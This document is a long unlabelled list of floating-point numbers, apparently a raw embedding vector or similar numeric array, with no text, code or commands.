-0.027038320899009705, 0.001213819021359086, 0.006882099900394678, 0.027500394731760025, 0.00047695121611468494, -0.02593214437365532, -0.017698828130960464, -0.005019802134484053, 0.03690989688038826, -0.000597282953094691, 0.012265960685908794, -0.008394341915845871, 0.0028634576592594385, -0.046655457466840744, 0.025498075410723686, -0.0003997201274614781, -0.014492316171526909, -0.044555120170116425, 0.010144621133804321, 0.029236672446131706, -0.01337213721126318, -0.027710428461432457, 0.01776883937418461, 0.00025400935555808246, -0.002310369163751602, 0.044835165143013, 0.023047683760523796, 0.009542524814605713, -0.01419826876372099, -0.0007136765634641051, 0.004515721462666988, -0.008856415748596191, -0.006668565794825554, -0.017698828130960464, 0.0017642820021137595, 0.032513197511434555, 0.008695390075445175, -0.002327871974557638, -0.028340529650449753, 0.042678821831941605, -0.0018570467364042997, 0.014786362648010254, -0.017194747924804688, 0.010235635563731194, -0.0058039273135364056, 0.001172687392681837, -0.021395418792963028, 0.05315249413251877, 0.009598533622920513, 0.00018618600734043866, -0.005831932183355093, -0.0013669684994965792, -0.020737314596772194, 0.00993458740413189, 0.02090534009039402, -0.01611657626926899, 0.011992916464805603, -0.009269481524825096, 0.004480716306716204, 0.01460433378815651, -0.035789720714092255, -0.007547206245362759, -0.031477030366659164, -0.017950868234038353, -0.01402324065566063, 0.018720991909503937, 0.0039521316066384315, -0.043518953025341034, -0.006111976690590382, 0.03200911730527878, -0.004879779648035765, -0.018146900460124016, -0.023327728733420372, -0.0049217864871025085, -0.011663864366710186, -0.007274162489920855, -0.013323129154741764, 0.003208262613043189, 0.009647541679441929, -0.009598533622920513, -0.011810887604951859, 0.027010316029191017, 0.014324288815259933, -0.005614897236227989, 0.008513360284268856, 0.026016157120466232, 0.004764261189848185, 0.004799266811460257, -0.039178259670734406, -0.029488712549209595, 0.02990878000855446, -0.03786205127835274, 0.047467585653066635, -0.012244956567883492, 0.0203312486410141, 0.018608974292874336, 0.024377895519137383, -0.02254360355436802, -0.0012812047498300672, 0.01074671745300293, -0.010564688593149185, -0.006836592685431242, -0.0003706217394210398, 0.0035495671909302473, 0.017656821757555008, 0.018833009526133537, -0.009038444608449936, 0.015570488758385181, -0.014618336223065853, -0.01265802327543497, -0.0012820798438042402, -0.006353515200316906, 0.003150503383949399, 0.010991756804287434, -0.017432786524295807, -0.004414205439388752, 0.002056578639894724, -0.001052793231792748, 0.006020962260663509, 0.0028319526463747025, 0.010256638750433922, 0.006266001611948013, -0.034977588802576065, -0.0004948916030116379, -0.028536560013890266, -0.02301967889070511, -0.0014903631526976824, 0.009304487146437168, -0.026800282299518585, -0.008604374714195728, 0.0204432662576437, -0.012644020840525627, -0.008786404505372047, 0.010641700588166714, 0.020947348326444626, -0.0026761777698993683, -0.008947430178523064, -0.06222594529390335, -0.009899581782519817, -0.025498075410723686, 0.02065329998731613, -0.035565685480833054, -0.008275322616100311, -0.0225296001881361, 0.0009924086043611169, 0.024909980595111847, 0.024811964482069016, 0.015794524922966957, 0.029712747782468796, -0.006955611519515514, 0.013827209360897541, -0.006987116765230894, -0.008961432613432407, -0.010172626003623009, 0.01753080077469349, -0.0049567921087145805, -0.03184108808636665, 0.04486316815018654, -0.0048132692463696, 0.00654254574328661, -0.03618178144097328, 0.01126480009406805, 0.00042444284190423787, -0.038002073764801025, -0.0013039583573117852, -0.006129479501396418, 0.003451551543548703, 0.0047537595964968204, -0.054832763969898224, 0.023061685264110565, 0.0015507477801293135, -0.029852770268917084, -0.029824767261743546, -0.007288164924830198, -0.018496956676244736, -0.024377895519137383, 0.00452622352167964, 0.000997659401036799, -0.02534404955804348, 0.004729255568236113, 0.004830772057175636, 0.015234434977173805, 0.020513277500867844, 0.0015192427672445774, -0.011453830637037754, -0.009598533622920513, -0.010249637998640537, 0.03856216371059418, -0.03237317502498627, 0.01471635140478611, -0.023551763966679573, -0.042090725153684616, -0.003390291705727577, 0.021521439775824547, 0.02065329998731613, -0.028284519910812378, -0.004421206656843424, -0.020695308223366737, -0.019799163565039635, 0.0004502594529185444, -0.0020110714249312878, -0.018020879477262497, -0.00007963772804941982, 0.01172687392681837, -0.0027251855935901403, 0.016746675595641136, 0.0168306902050972, 0.022445587441325188, -0.002151093678548932, -0.022095531225204468, -0.011250797659158707, 0.04181068018078804, -0.037329964339733124, -0.024223871529102325, 0.011607854627072811, 0.021073367446660995, -0.0035793220158666372, -0.011138780042529106, -0.015738515183329582, -0.007589212618768215, -0.00027741934172809124, -0.006787584628909826, -0.020527280867099762, -0.006941609550267458, -0.038814201951026917, -0.00824031699448824, -0.0017844102112576365, 0.0013468402903527021, -0.018006877973675728, -0.01454832497984171, -0.008583371527493, -0.003225765423849225, -0.03156104311347008, 0.0319531075656414, -0.002100335666909814, 0.0007705606403760612, -0.014814367517828941, -0.006525042932480574, -0.03839413449168205, -0.004459712654352188, 0.007701230701059103, -0.010788723826408386, 0.009549526497721672, 0.0446111299097538, 0.012111935764551163, -0.007729235105216503, 0.027472389861941338, -0.018398940563201904, 0.0061539835296571255, 0.01261601597070694, -0.008912424556910992, 0.019897179678082466, -0.017222752794623375, -0.022347571328282356, -0.0047572604380548, -0.032513197511434555, -0.008548365905880928, -0.00881440844386816, -0.021787481382489204, -0.01855296455323696, -0.007610216271132231, -0.014450309798121452, -0.02054128237068653, 0.012525001540780067, 0.00031898848828859627, -0.010039604268968105, -0.019127056002616882, -0.0029527219012379646, -0.023299723863601685, -0.005572890397161245, -0.017670823261141777, -0.004141161683946848, 0.10216032713651657, 0.0018570467364042997, -0.03679788112640381, 0.007820249535143375, 0.004340693820267916, 0.002586913527920842, -0.013449149206280708, 0.004424707032740116, -0.0221935473382473, -0.007722233887761831, 0.044555120170116425, -0.00887041725218296, 0.004799266811460257, 0.008730394765734673, 0.0013914724113419652, -0.011628858745098114, 0.007848254404962063, -0.007137640845030546, 0.00018706114497035742, -0.020639298483729362, -0.0063920216634869576, 0.012798044830560684, -0.0060839722864329815, -0.026324206963181496, 0.01039666123688221, 0.015668503940105438, -0.006591553334146738, -0.007582211866974831, -0.05256440117955208, -0.0038156097289174795, 0.005562388803809881, 0.018356934189796448, -0.0086393803358078, -0.005562388803809881, 0.003472554963082075, 0.017558805644512177, 0.00714814243838191, 0.004081652499735355, -0.015164423733949661, -0.004253179766237736, 0.001193690812215209, 0.001185814500786364, -0.026688264682888985, -0.012651021592319012, 0.012482995167374611, -0.009850574657320976, 0.024797962978482246, -0.0028407040517777205, -0.032513197511434555, 0.023313725367188454, -0.00794626958668232, -0.006052467040717602, 0.014107254333794117, 0.011698869988322258, -0.0006935483543202281, 0.00905244704335928, 0.019701149314641953, -0.02932068519294262, -0.002968474291265011, 0.0003496183780953288, -0.020597292110323906, -0.005660404451191425, 0.014772361144423485, 0.007617217488586903, 0.0050968145951628685, -0.005726915318518877, 0.0038156097289174795, 0.009290484711527824, 0.0028897118754684925, 0.026716269552707672, 0.0030594889540225267, 0.013463151641190052, -0.025554083287715912, 0.005695410072803497, -0.015234434977173805, 0.029124654829502106, 0.004330192226916552, 0.030440865084528923, 0.02754240110516548, -0.03550967574119568, 0.013246117159724236, 0.02603016048669815, 0.007365176919847727, 0.031084967777132988, 0.0026306703221052885, 0.029040640220046043, 0.0014116006204858422, -0.007764240726828575, 0.008324330672621727, -0.002224605530500412, -0.002345374785363674, -0.021325407549738884, 0.016984714195132256, 0.003976635634899139, 0.024783961474895477, 0.029684744775295258, 0.024685945361852646, -0.01015162281692028, -0.0024608932435512543, -0.005768922157585621, 0.0009267731220461428, -0.008366337046027184, 0.02381780557334423, -0.0095705296844244, -0.031477030366659164, -0.011376817710697651, -0.0019183065742254257, 0.017474792897701263, 0.0006467283819802105, -0.005432868376374245, -0.046991508454084396, -0.015556486323475838, 0.010242637246847153, -0.027654418721795082, -0.021213389933109283, 0.028536560013890266, -0.0014282282209023833, 0.009640540927648544, -0.033577367663383484, -0.008289325051009655, 0.00870239082723856, -0.00013116159243509173, 0.03419346362352371, 0.009472513571381569, 0.011649861931800842, 0.008191308937966824, 0.0060839722864329815, -0.01739078015089035, 0.023187706246972084, 0.01172687392681837, 0.023789802566170692, -0.0016907701501622796, -0.0028949626721441746, -0.027710428461432457, 0.01575251668691635, -0.024027839303016663, 0.013302125968039036, -0.008422345854341984, -0.015850532799959183, -0.016676664352416992, -0.00864638201892376, 0.023327728733420372, 0.014576329849660397, -0.017572809010744095, 0.0168306902050972, 0.0039031237829476595, 0.004897282458841801, -0.003118998371064663, 0.03424947336316109, 0.031589049845933914, -0.009598533622920513, -0.014324288815259933, 0.03354936093091965, 0.011635859496891499, -0.0028512056451290846, -0.003047236939892173, 0.016970712691545486, -0.03360537067055702, 0.010039604268968105, 0.0017143989680334926, 0.026786280795931816, 0.005390861537307501, 0.003976635634899139, -0.021311406046152115, 0.005394361913204193, 0.01890302076935768, 0.024111853912472725, -0.03175707533955574, -0.012539003975689411, -0.021521439775824547, 0.023173702880740166, 0.024965990334749222, -0.023649780079722404, 0.008898422122001648, 0.03884220868349075, -0.0016846442595124245, 0.0003839676210191101, 0.01811889559030533, 0.02416786178946495, 0.005940449424088001, -0.0035705706104636192, 0.01867898553609848, 0.04284684732556343, 0.027710428461432457, 0.008100294508039951, -0.008555367588996887, 0.013925225473940372, 0.012721032835543156, -0.004078151658177376, 0.008345333859324455, 0.007918265648186207, 0.05592493712902069, -0.0071761468425393105, -0.019477112218737602, -0.023663781583309174, -0.012454990297555923, 0.0010186628205701709, -0.0029334689024835825, 0.00038243611925281584, 0.00798827689141035, 0.015850532799959183, -0.006588052958250046, 0.006794585846364498, 0.03371739014983177, -0.013624177314341068, -0.011873897165060043, -0.00697311433032155, -0.004596234764903784, 0.006647562142461538, 0.014135259203612804, 0.0026954307686537504, 0.011740876361727715, 0.0009013940580189228, 0.043518953025341034, -0.019827168434858322, -0.013974233530461788, 0.008303326554596424, -0.01622859388589859, -0.01645262911915779, 0.014940387569367886, -0.004200671333819628, 0.03536965325474739, 0.013330129906535149, 0.003082242561504245, 0.009269481524825096, 0.020121214911341667, 0.02943270280957222, -0.007386180572211742, -0.016410622745752335, -0.006381520070135593, 0.009899581782519817, 0.01761481538414955, -0.00487277889624238, 0.0038576165679842234, 0.003574071219190955, -0.000631413422524929, -0.009913584217429161, 0.016494635492563248, 0.007848254404962063, 0.011488836258649826, -0.008919425308704376, -0.0008891421020962298, -0.013687187805771828, 0.03296126797795296, -0.009255479089915752, -0.00027698176563717425, 0.015808526426553726, -0.0006064719054847956, -0.004445710685104132, 0.022711629047989845, -0.021647458896040916, -0.0159765537828207, -0.0062239947728812695, 0.004431708250194788, -0.011572849936783314, 0.029488712549209595, 0.002163345692679286, 0.013631178066134453, 0.023285720497369766, 0.01562649756669998, 0.0062765032052993774, -0.025288041681051254, -0.016676664352416992, 0.021997515112161636, -0.014177265577018261, 0.02559608966112137, 0.023649780079722404, -0.010557686910033226, 0.012314967811107635, -0.009010439738631248, -0.0070536271668970585, 0.0012330720201134682, -0.007540205027908087, -0.017838850617408752, -0.016312606632709503, 0.004963793326169252, -0.0017957870149984956, 0.00824031699448824, -0.016550645232200623, -0.003400793531909585, -0.010480674915015697, 0.029152659699320793, 0.005765421316027641, -0.019771160557866096, -0.006430527660995722, -0.01706872694194317, -0.011026762425899506, 0.005947450641542673, -0.02278164029121399, 0.002242108341306448, -0.010368657298386097, -0.0012925815535709262, 0.003082242561504245, -0.017026720568537712, 0.016088571399450302, -0.0191410593688488, -0.00004783186159329489, 0.0015201179776340723, -0.0008230690145865083, -0.012293964624404907, -0.010599694214761257, 0.04217474162578583, 0.021675463765859604, 0.011355814523994923, -0.01402324065566063, 0.01960313320159912, -0.010410663671791553, 0.017894860357046127, 0.005128319375216961, 0.0016793933464214206, -0.014926385134458542, -0.003533814800903201, -0.012188947759568691, 0.0018010378116741776, -0.004925287328660488, -0.016984714195132256, 0.00014800802455283701, 0.02556808665394783, -0.024587929248809814, 0.0017397780902683735, -0.013974233530461788, -0.010893740691244602, -0.040466468781232834, -0.003941630013287067, 0.01051568053662777, 0.013183106668293476, 0.020849332213401794, -0.00458223232999444, -0.012223953381180763, -0.03480956330895424, 0.02404184266924858, 0.006385020446032286, -0.000018747135982266627, -0.011061768047511578, 0.0031785080209374428, -0.0025011496618390083, 0.002380380406975746, -0.0029474711045622826, 0.009521521627902985, -0.0028984632808715105, -0.03223315253853798, 0.034165460616350174, -0.0041971709579229355, 0.012496997602283955, 0.0020198228303343058, -0.001202442217618227, -0.020737314596772194, -0.018356934189796448, 0.013736194930970669, 0.0006878599524497986, -0.0013608424924314022, -0.002133590867742896, -0.014366296119987965, 0.026436224579811096, 0.020261237397789955, 0.034025438129901886, 0.0018798004603013396, -0.004498218651860952, 0.01103376317769289, -0.02359377034008503, -0.0016960210632532835, 0.012588012032210827, 0.000497517001349479, 0.013302125968039036, -0.013792203739285469, 0.006665064953267574, -0.0027934464160352945, 0.0051843286491930485, -0.00011223668843740597, -0.029040640220046043, 0.008548365905880928, 0.007113136816769838, -0.02056928724050522, 0.003554818220436573, -0.001008161110803485, 0.01326011959463358, 0.01753080077469349, 0.010529682971537113, 0.007239156868308783, -0.026660259813070297, -0.019001036882400513, -0.008030283264815807, 0.006556547712534666, 0.0026551743503659964, -0.02299167402088642, 0.006997618358582258, -0.008058288134634495, 0.002180848503485322, -0.00026166680618189275, -0.0009766560979187489, -0.0019480612827464938, 0.006882099900394678, 0.029348690062761307, 0.02825651504099369, 0.029348690062761307, -0.005635900888592005, 0.0029072146862745285, 0.0003421796718612313, -0.00607697106897831, 0.004036144819110632, -0.00679808622226119, 0.0009110206156037748, 0.00227536354213953, 0.016718672588467598, 0.01238497905433178, 0.023649780079722404, -0.012854054570198059, -0.004512221086770296, 0.004102655686438084, 0.0170547254383564, 0.018160901963710785, -0.0051493230275809765, -0.011047765612602234, -0.0026604251470416784, -0.0311689805239439, -0.0042076725512743, -0.042314764112234116, 0.019589129835367203, -0.006728075444698334, 0.01028464362025261, 0.01109677366912365, 0.007134140003472567, -0.03968233987689018, -0.021647458896040916, 0.011838891543447971, -0.014828369952738285, -0.006602054927498102, -0.005695410072803497, 0.012398981489241123, 0.014352293685078621, 0.031813085079193115, 0.03996238484978676, -0.0026394217275083065, -0.02839653752744198, 0.016508638858795166, -0.010732715018093586, -0.012525001540780067, 0.003327281679958105, -0.003421796951442957, -0.011250797659158707, 0.025890138000249863, -0.006724574603140354, 0.012924065813422203, 0.0007246158202178776, -0.023033680394291878, -0.00017743460193742067, -0.023775799199938774, -0.003336033085361123, -0.0042076725512743, -0.007330171298235655, 0.033325325697660446, 0.015374457463622093, 0.005457371938973665, 0.020289242267608643, -0.0003334282955620438, -0.020009197294712067, -0.009864576160907745, 0.0047712624073028564, -0.01495439000427723, 0.008282323367893696, 0.029796762391924858, 0.004396702628582716, 0.02932068519294262, 0.004676747601479292, 0.029964787885546684, 0.010844733566045761, -0.009073450230062008, 0.011768881231546402, -0.0085273627191782, -0.03887021169066429, 0.020345252007246017, 0.003189009614288807, -0.01949111558496952, 0.0002290678530698642, 0.019771160557866096, -0.01307808980345726, -0.009213472716510296, -0.007151642814278603, 0.015500477515161037, -0.0008860790985636413, 0.01051568053662777, 0.006997618358582258, 0.009171465411782265, 0.002401383826509118, -0.022697627544403076, 0.0202192310243845, 0.012321969494223595, 0.020163223147392273, 0.016676664352416992, -0.0007421185728162527, -0.00793226808309555, 0.02545606903731823, -0.003560069017112255, -0.0013153351610526443, 0.007435188163071871, 0.0027986972127109766, -0.005562388803809881, 0.025624094530940056, 0.004589233547449112, -0.005506379995495081, -0.0028389536309987307, -0.009955590590834618, -0.015458470210433006, 0.006430527660995722, -0.00714814243838191, -0.02486797422170639, -0.012433987110853195, 0.008359336294233799, -0.018020879477262497, -0.011012759990990162, 0.015024401247501373, -0.014842372387647629, 0.0063570160418748856, 0.002224605530500412, 0.008681387640535831, 0.005460872780531645, -0.019001036882400513, -0.027416381984949112, -0.034025438129901886, -0.015402461402118206, 0.0013092092704027891, 0.019477112218737602, 0.004309188574552536, -0.03436149284243584, -0.001981316599994898, 0.021423423662781715, 0.0027864451985806227, 0.01172687392681837, -0.024083849042654037, 0.0038331125397235155, -0.01045267004519701, 0.010158623568713665, -0.00654254574328661, 0.008051286451518536, 0.000009995737855206244, 0.03724595159292221, 0.02663225680589676, 0.0010405413340777159, 0.0011753127910196781, 0.008149302564561367, 0.015738515183329582, -0.006111976690590382, 0.0023156199604272842, 0.010669705457985401, -0.013386139646172523, 0.0024258876219391823, -0.021521439775824547, 0.007232155650854111, -0.005597394425421953, -0.003931128419935703, 0.006724574603140354, -0.009521521627902985, -0.013246117159724236, -0.008002279326319695, 0.00645503168925643, 0.005453871563076973, 0.0002695430885069072, 0.007862256839871407, -0.02416786178946495, 0.0015848783077672124, -0.015346452593803406, 0.011215792037546635, 0.03340933844447136, -0.0018447948386892676, 0.010004598647356033, 0.014016239903867245, 0.0062590003944933414, 0.0007674976368434727, 0.0095145208761096, -0.009815569035708904, -0.003425297327339649, -0.0006572300335392356, 0.004067650064826012, 0.004792266059666872, -0.010956751182675362, -0.0004084715328644961, -0.00922047346830368, -0.010130618698894978, -0.005922946613281965, 0.016074568033218384, 0.00220535253174603, 0.014205270446836948, -0.0032485192641615868, -0.0025326546747237444, 0.002369878813624382, -0.02324371412396431, -0.0018727992428466678, -0.008072289638221264, -0.004375699441879988, -0.0027164341881871223, 0.009871577844023705, 0.0029334689024835825, -0.025736112147569656, -0.007904263213276863, -0.0038681181613355875, -0.027136337012052536, -0.01307808980345726, -0.009598533622920513, 0.01038265973329544, 0.0036475828383117914, -0.022627616301178932, 0.015108414925634861, 0.010270641185343266, -0.002270112745463848, 0.00220360211096704, 0.0001127836512750946, 0.029516717419028282, 0.018188906833529472, 0.014674345031380653, -0.0005583392339758575, -0.010403662919998169, -0.019169064238667488, 0.003285275073722005, 0.002152844099327922, 0.012447989545762539, -0.003406044328585267, 0.010354654863476753, 0.0158645361661911, 0.012454990297555923, -0.031589049845933914, -0.002543156500905752, 0.009766560979187489, -0.012258959002792835, 0.0048062680289149284, -0.003446300746873021, 0.01104076486080885, 0.008030283264815807, 0.005058308597654104, -0.016900701448321342, -0.008275322616100311, 0.00012602013885043561, 0.01051568053662777, -0.024349890649318695, 0.002228106139227748, -0.01562649756669998, 0.0052718427032232285, -0.010550686158239841, -0.0014632338425144553, 0.012062927708029747, -0.011341813020408154, -0.010844733566045761, -0.020107213407754898, 0.0026516737416386604, 0.00004293655001674779, 0.008072289638221264, -0.026366213336586952, 0.03349335119128227, -0.01365918293595314, -0.01349115651100874, 0.016536641865968704, 0.007218153681606054, 0.00033999182051047683, -0.01845494844019413, 0.017796844244003296, 0.010942748747766018, -0.027612412348389626, -0.008772402070462704, 0.006311508826911449, -0.003481306368485093, -0.018062885850667953, 0.008576370775699615, 0.025162020698189735, -0.0038541159592568874, 0.010494677349925041, 0.030104810371994972, 0.01034065242856741, -0.016634657979011536, 0.011754878796637058, 0.0017459039809182286, 0.004085152875632048, -0.0074141849763691425, 0.007757239509373903, -0.014926385134458542, -0.009906583465635777, -0.006637060549110174, -0.009213472716510296, -0.00927648227661848, 0.006304507609456778, -0.008205311372876167, -0.013148101046681404, 0.01336513552814722, -0.008156303316354752, 0.015346452593803406, -0.010893740691244602, -0.012363975867629051, -0.025890138000249863, 0.01624259538948536, -0.016900701448321342, -0.008632379584014416, -0.0028827106580138206, 0.015444467775523663, -0.01971515081822872, 0.0190290417522192, 0.0029037140775471926, 0.0019970692228525877, -0.041390616446733475, 0.004501719493418932, 0.0014588581398129463, 0.019169064238667488, 0.010830731131136417, -0.0030682403594255447, -0.007673226296901703, -0.0023786302190274, -0.01541646383702755, -0.019085049629211426, -0.0003660272341221571, 0.00648303609341383, -0.0035268135834485292, 0.02345374785363674, -0.013456150889396667, 0.006556547712534666, -0.0064970385283231735, 0.009199470281600952, 0.0029999795369803905, -0.009073450230062008, -0.0058739385567605495, 0.012370976619422436, -0.012048925273120403, 0.016144579276442528, -0.002151093678548932, -0.008597373962402344, 0.026814285665750504, 0.0008449475280940533, -0.02020522952079773, -0.010599694214761257, 0.010172626003623009, -0.02722034975886345, -0.0018482953310012817, -0.030440865084528923, -0.008611376397311687, 0.01402324065566063, -0.00671407300978899, -0.009381499141454697, 0.027360372245311737, -0.000020976009182049893, -0.0031907600350677967, -0.021101372316479683, -0.0015682505909353495, 0.0013757199048995972, 0.0019445607904344797, 0.029684744775295258, -0.0013363385805860162, -0.0018570467364042997, -0.01265802327543497, -0.00686109671369195, 0.007526202592998743, 0.0016855193534865975, 0.011635859496891499, -0.009591532871127129, 0.03220514580607414, -0.00232087098993361, 0.0025326546747237444, -0.011243796907365322, 0.027262356132268906, 0.009472513571381569, 0.009171465411782265, 0.011026762425899506, 0.011460831388831139, 0.018875015899538994, -0.0061539835296571255, -0.005474874749779701, 0.0072111524641513824, -0.004599735140800476, 0.015710510313510895, -0.004011641256511211, 0.011586851440370083, 0.009059447795152664, -0.03237317502498627, 0.007533203810453415, -0.011544845066964626, -0.003259020857512951, 0.011467833071947098, 0.01950511708855629, -0.00881440844386816, 0.002331372583284974, -0.003379790112376213, 0.007876258343458176, -0.028676582500338554, -0.02173147350549698, -0.009507519192993641, 0.005786424968391657, 0.0042076725512743, -0.011005759239196777, -0.00023672533279750496, 0.016760678961873055, 0.02195550873875618, -0.0026044161058962345, 0.015794524922966957, 0.0017546553863212466, -0.005527383182197809, 0.020261237397789955, 0.008359336294233799, -0.007183148059993982, -0.004963793326169252, -0.008674385957419872, -0.00686109671369195, -0.011488836258649826, 0.01972915232181549, 0.009696549735963345, -0.024251876398921013, 0.016844691708683968, -0.02124139480292797, 0.0007219903636723757, 0.018020879477262497, 0.021773479878902435, 0.010263640433549881, -0.021073367446660995, -0.0007740611908957362, 0.0028932124841958284, -0.008912424556910992, -0.008695390075445175, -0.003379790112376213, -0.010599694214761257, 0.0013407142832875252, -0.025708109140396118, 0.00806528888642788, -0.012770040892064571, 0.006763080600649118, 0.02827051840722561, -0.0012444488238543272, -0.017600812017917633, -0.01986917480826378, -0.00211783847771585, -0.012244956567883492, 0.011068768799304962, 0.010970753617584705, 0.009591532871127129, -0.00033889792393893003, -0.0001916556357173249, -0.0037841047160327435, -0.01811889559030533, -0.008723394013941288, -0.010375658050179482, -0.023383736610412598, -0.00046644953545182943, -0.012623017653822899, 0.002329622395336628, -0.023425742983818054, -0.019771160557866096, 0.004270682577043772, 0.009402502328157425, -0.012314967811107635, 0.008268320932984352, -0.003479556180536747, 0.010613696649670601, -0.0037140934728085995, -0.0009215222671627998, 0.0035058101639151573, -0.0037701025139540434, -0.020947348326444626, -0.013407142832875252, 0.004627739544957876, 0.011649861931800842, -0.006927607115358114, 0.008058288134634495, -0.004298686981201172, 0.018650980666279793, 0.012882058508694172, -0.028872614726424217, -0.017656821757555008, -0.0075192018412053585, -0.020877337083220482, 0.007372178137302399, -0.01219594944268465, -0.0031732572242617607, 0.0036160778254270554, -0.03506160154938698, 0.009430507197976112, 0.0009188968688249588, 0.01250399835407734, 0.0001232853246619925, 0.008968433365225792, -0.004589233547449112, -0.0004277246189303696, 0.00607697106897831, -0.004078151658177376, -0.02090534009039402, -0.02055528573691845, -0.000546524825040251, -0.0012812047498300672, 0.014352293685078621, -0.0016041313065215945, -0.001002035103738308, -0.02173147350549698, 0.021801484748721123, 0.0016163833206519485, -0.0008217563154175878, 0.015850532799959183, -0.04329491779208183, -0.009864576160907745, -0.0127350352704525, 0.007834251970052719, -0.008219313807785511, 0.018258918076753616, 0.022837650030851364, -0.00859037321060896, -0.012609015218913555, 0.009402502328157425, 0.025078007951378822, 0.020513277500867844, 0.003140001790598035, -0.005488877184689045, 0.0006217868649400771, 0.03035685047507286, -0.027402378618717194, 0.017194747924804688, 0.009031442925333977, -0.0061539835296571255, -0.00017513736383989453, 0.005761920940130949, 0.02124139480292797, 0.00027391876210458577, -0.015598492696881294, 0.009374498389661312, 0.02348175272345543, 0.0005312098655849695, -0.012307967059314251, -0.0385061539709568, -0.021801484748721123, -0.004799266811460257, 0.010116617195308208, 0.009843572974205017, -0.011005759239196777, -0.008912424556910992, 0.0042356769554317, -0.013204109854996204, -0.009815569035708904, 0.0019183065742254257, -0.0071061355993151665, -0.009836572222411633, -0.0352296307682991, 0.010263640433549881, -0.009388500824570656, 0.014478313736617565, -0.05124818906188011, 0.007827251218259335, 0.01265802327543497, -0.01986917480826378, -0.008737396448850632, -0.007547206245362759, -0.01039666123688221, 0.017194747924804688, -0.01565450243651867, 0.000614785763900727, -0.015402461402118206, -0.018244916573166847, -0.00437919981777668, -0.008072289638221264, -0.003434048732742667, 0.010172626003623009, 0.0019043043721467257, -0.01506640762090683, -0.005544885993003845, -0.0024923982564359903, -0.02661825343966484, 0.021045362576842308, -0.022459588944911957, -0.019071048125624657, 0.02486797422170639, -0.016158582642674446, -0.014212271198630333, 0.020639298483729362, 0.014142259955406189, 0.002256110543385148, 0.0017590310890227556, -0.019645139575004578, -0.014352293685078621, -0.006041965447366238, 0.00039687592652626336, -0.012202950194478035, -0.005614897236227989, -0.0038016075268387794, 0.01552848145365715, -0.0009442759328521788, 0.020625296980142593, -0.010704711079597473, 0.008555367588996887, -0.0014693598495796323, 0.007589212618768215, -0.005089813377708197, 0.008884419687092304, 0.00806528888642788, -0.026660259813070297, -0.013414143584668636, -0.0057234144769608974, -0.0040396456606686115, 0.009969593025743961, -0.010333651676774025, 0.0030402359552681446, -0.007011620327830315, 0.004529723897576332, -0.03338133543729782, 0.010725714266300201, -0.010326649993658066, 0.007904263213276863, 0.003280024277046323, -0.008856415748596191, -0.004596234764903784, 0.00039206264773383737, -0.025190025568008423, -0.012230955064296722, -0.005709412507712841, -0.018987033516168594, -0.005275343079119921, -0.018412942066788673, -0.012433987110853195, -0.00732317054644227, 0.005093313753604889, -0.008975434117019176, 0.009493516758084297, 0.0025396558921784163, 0.024909980595111847, 0.0059264469891786575, 0.024545922875404358, 0.01307808980345726, 0.006822590250521898, -0.00015030527720227838, 0.0030314845498651266, -0.00999059621244669, -0.016606653109192848, 0.010431666858494282, 0.021227393299341202, 0.0070186215452849865, -0.00048482746933586895, -0.02301967889070511, 0.015458470210433006, -0.012987075373530388, -0.038254112005233765, -0.009346493519842625, 0.018272919580340385, 0.016648661345243454, -0.003402543719857931, -0.02089133858680725, -0.0008020656532607973, 0.040438462048769, 0.010445669293403625, 0.0014719852479174733, -0.011488836258649826, 0.026828287169337273, 0.009661544114351273, -0.0059789554215967655, -0.01575251668691635, -0.02465794049203396, 0.03293326497077942, -0.0028407040517777205, -0.02042926475405693, -0.0038051081355661154, 0.013442148454487324, 0.011747877113521099, 0.015192427672445774, -0.00038024826790206134, 0.0069836159236729145, -0.029124654829502106, -0.016074568033218384, -0.00633601238951087, -0.008450350724160671, 0.026660259813070297, 0.012630018405616283, -0.005537885241210461, -0.0029194664675742388, 0.010872737504541874, -0.007067629601806402, 0.00412015849724412, 0.009458511136472225, 0.024797962978482246, 0.01359617244452238, -0.007575210649520159, -0.003369288519024849, -0.022823646664619446, 0.030748914927244186, -0.0015822529094293714, -0.004841273650527, -0.015822527930140495, 0.001155184581875801, 0.029964787885546684, -0.0018920523580163717, -0.002222855342552066, 0.006532043684273958, 0.022389577701687813, -0.014856373891234398, -0.021283401176333427, -0.007190149277448654, 0.01751679927110672, 0.007694229483604431, 0.005481875967234373, -0.014058246277272701, 0.0011954410001635551, 0.003117248183116317, 0.014282282441854477, 0.0009188968688249588, -0.012307967059314251, -0.0042916857637465, -0.005152823403477669, 0.005082812160253525, -0.004459712654352188, -0.007008119951933622, -0.0046312399208545685, 0.007109636440873146, 0.00031483155908063054, 0.002569410717114806, -0.012419984675943851, 0.013470152392983437, 0.024587929248809814, 0.025862133130431175, 0.0013135849731042981, 0.0052718427032232285, -0.021045362576842308, 0.026338208466768265, -0.012489995919167995, 0.006010460667312145, -0.014177265577018261, -0.010137620382010937, 0.003322030883282423, -0.0037631012964993715, 0.003166256006807089, -0.005093313753604889, -0.010438668541610241, -0.01891702227294445, -0.0037455984856933355, -0.007491196971386671, 0.004050147254019976, -0.012258959002792835, 0.044891174882650375, -0.005768922157585621, -0.0014238525182008743, -0.026016157120466232, 0.02090534009039402, 0.004421206656843424, 0.01575251668691635, -0.03349335119128227, 0.011677865870296955, -0.015612495131790638, 0.008009280078113079, 0.02708032727241516, -0.0011753127910196781, -0.0014824869576841593, 0.021451428532600403, -0.017810845747590065, -0.017922865226864815, -0.023439746350049973, -0.010522681288421154, -0.020387258380651474, 0.01149583701044321, -0.010935747995972633, 0.010333651676774025, 0.016662662848830223, 0.003507560584694147, -0.019813166931271553, 0.0004410705005284399, 0.003280024277046323, 0.0019918184261769056, 0.01998119242489338, -0.010487675666809082, -0.021913502365350723, 0.008499357849359512, 0.017096731811761856, -0.0029737253207713366, 0.0007613716879859567, 0.008772402070462704, 0.0016426375368610024, 0.02675827592611313, 0.030104810371994972, 0.0058564357459545135, -0.0064795357175171375, 0.0041621653363108635, -0.02243158407509327, -0.016186587512493134, 0.019127056002616882, -0.008324330672621727, -0.000015096162314875983, -0.0057409172877669334, -0.006602054927498102, -0.020597292110323906, 0.01454832497984171, 0.021815486252307892, 0.018062885850667953, -0.008786404505372047, -0.006980115547776222, -0.030216829851269722, 0.015150421299040318, 0.004792266059666872, -0.01670466922223568, 0.0003347409947309643, 0.0008970183553174138, 0.005313849076628685, -0.01371519174426794, 0.008751398883759975, -0.010732715018093586, 0.004536725115031004, 0.023047683760523796, -0.011852893978357315, 0.016410622745752335, 0.019113054499030113, 0.027654418721795082, 0.01669066771864891, -0.008506359532475471, -0.02359377034008503, -0.020023200660943985, 0.02055528573691845, -0.003640581853687763, 0.01242698635905981, 